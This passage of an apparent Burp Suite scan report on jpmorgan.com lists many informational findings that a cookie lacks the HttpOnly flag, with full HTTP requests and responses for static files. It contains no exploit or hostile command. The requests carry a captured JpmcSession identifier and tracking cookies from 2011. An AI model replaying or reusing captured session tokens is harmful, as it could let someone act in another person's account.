11.638. http://www.jpmorgan.com/images/navbar_leftcorner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/navbar_leftcorner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/navbar_leftcorner.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT
ETag: "72ab2-63-9a51d180"
Accept-Ranges: bytes
Content-Length: 99
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......pijbYW;%...!.......,..........4....=...gR....+/Q.X..    ".9....i...m...S|....B.... ....;

11.639. http://www.jpmorgan.com/images/navbar_map.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/navbar_map.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/navbar_map.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Thu, 17 Jul 2008 22:14:32 GMT
ETag: "72abc-f3-90c3a200"
Accept-Ranges: bytes
Content-Length: 243
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a+.......yi..x...xk^.........e]]!.......,....+......x...0.I..8..3P..u...Fj.S0.....$.cE.......P.)x..q)(.r...P....FS..NU.C............4...u..xj..f.
?(`TP.].}..1.hSh.\F.7\M.Rq...o...;.,..ga...3c.).,
...[SNIP]...

11.640. http://www.jpmorgan.com/images/navbar_rightcorner2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/navbar_rightcorner2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/navbar_rightcorner2.gif HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:11 GMT
Server: Apache
Last-Modified: Fri, 28 Aug 2009 21:36:39 GMT
ETag: "2e411-5a-7ab207c0"
Accept-Ranges: bytes
Content-Length: 90
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/gif

GIF89a.......PA;...2.....!.......,..........+.............<.
T...R .Q.>e.....s..Ln...K...;

11.641. http://www.jpmorgan.com/images/news_buttons.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/news_buttons.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/news_buttons.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 05 Nov 2008 00:08:28 GMT
ETag: "2e609-945-fac3f700"
Accept-Ranges: bytes
Content-Length: 2373
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....H.H.....C....................................................................C.......................................................................f.(.................................
...[SNIP]...

11.642. http://www.jpmorgan.com/images/news_gradient_cell.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/news_gradient_cell.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/news_gradient_cell.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:17 GMT
Server: Apache
Last-Modified: Thu, 04 Dec 2008 23:30:19 GMT
ETag: "2e60a-13c-f191d8c0"
Accept-Ranges: bytes
Content-Length: 316
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.............................................................*...................................
...[SNIP]...

11.643. http://www.jpmorgan.com/images/thumb_am_62.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/thumb_am_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_am_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:58:15 GMT
ETag: "18844-af5-fc1b6bc0"
Accept-Ranges: bytes
Content-Length: 2805
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ..........................................................>.>.."..............................
...[SNIP]...

11.644. http://www.jpmorgan.com/images/thumb_cb_62.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/thumb_cb_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_cb_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:58:57 GMT
ETag: "18845-822-fe9c4a40"
Accept-Ranges: bytes
Content-Length: 2082
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ..........................................................>.>.."..............................
...[SNIP]...

11.645. http://www.jpmorgan.com/images/thumb_ib_62.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/thumb_ib_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_ib_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:59:06 GMT
ETag: "18846-927-ff259e80"
Accept-Ranges: bytes
Content-Length: 2343
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ..........................................................>.>.."..............................
...[SNIP]...

11.646. http://www.jpmorgan.com/images/thumb_pb_62.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/thumb_pb_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_pb_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:59:40 GMT
ETag: "18847-82d-12c6b00"
Accept-Ranges: bytes
Content-Length: 2093
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ..........................................................>.>.."..............................
...[SNIP]...

11.647. http://www.jpmorgan.com/images/thumb_ts_62.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/thumb_ts_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_ts_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 13:59:50 GMT
ETag: "18848-76d-1c50180"
Accept-Ranges: bytes
Content-Length: 1901
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ..........................................................>.>.."..............................
...[SNIP]...

11.648. http://www.jpmorgan.com/images/thumb_wss_62.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /images/thumb_wss_62.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/thumb_wss_62.jpg HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:00:30 GMT
ETag: "18849-95b-4275b80"
Accept-Ranges: bytes
Content-Length: 2395
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/jpeg

......JFIF.....`.`.....C......................
.....
...
.................................C.......    ..    ..........................................................>.>.."..............................
...[SNIP]...

11.649. http://www.jpmorgan.com/script/jpmVideoPlayerHelper.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/jpmVideoPlayerHelper.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jpmVideoPlayerHelper.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:44 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 20:53:29 GMT
ETag: "2cd51-436-7c252440"
Accept-Ranges: bytes
Content-Length: 1078
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript


   var lightBoxTime = 0;
   

   function embedCallback(status)
   {
   }
   
   function addFlashBoundaryCallback()
   {
       theFlash = document.getElementById('jpmvplayer');
       theFlash.onmouseout=function(e)
       {
           
...[SNIP]...

11.650. http://www.jpmorgan.com/script/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery-1.3.2.min.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:42 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 23:36:59 GMT
ETag: "2cd46-dfa9-c6413cc0"
Accept-Ranges: bytes
Content-Length: 57257
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

11.651. http://www.jpmorgan.com/script/jquery.bgiframe.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/jquery.bgiframe.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery.bgiframe.min.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:44 GMT
Server: Apache
Last-Modified: Sat, 21 Jul 2007 22:45:56 GMT
ETag: "2c714-57a-ce817100"
Accept-Ranges: bytes
Content-Length: 1402
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...

11.652. http://www.jpmorgan.com/script/jquery.pngFix.pack.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/jquery.pngFix.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery.pngFix.pack.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:42 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 22:55:29 GMT
ETag: "2bc00-9bf-e8325a40"
Accept-Ranges: bytes
Content-Length: 2495
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
*
...[SNIP]...

11.653. http://www.jpmorgan.com/script/jquery_jpm_custom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/jquery_jpm_custom.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/jquery_jpm_custom.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:42 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 20:54:04 GMT
ETag: "2cd45-3e2e-7e3b3300"
Accept-Ranges: bytes
Content-Length: 15918
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript


// tabWidget custom class - Darren Andes
jQuery.fn.tabWidget=function(divTabId,props){props=jQuery.extend({show:0},props?props:{});var _ref=this;this.divTabId=divTabId;this.items=jQuery(this).child
...[SNIP]...

11.654. http://www.jpmorgan.com/script/lightbox_support/builder.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/builder.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/lightbox_support/builder.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
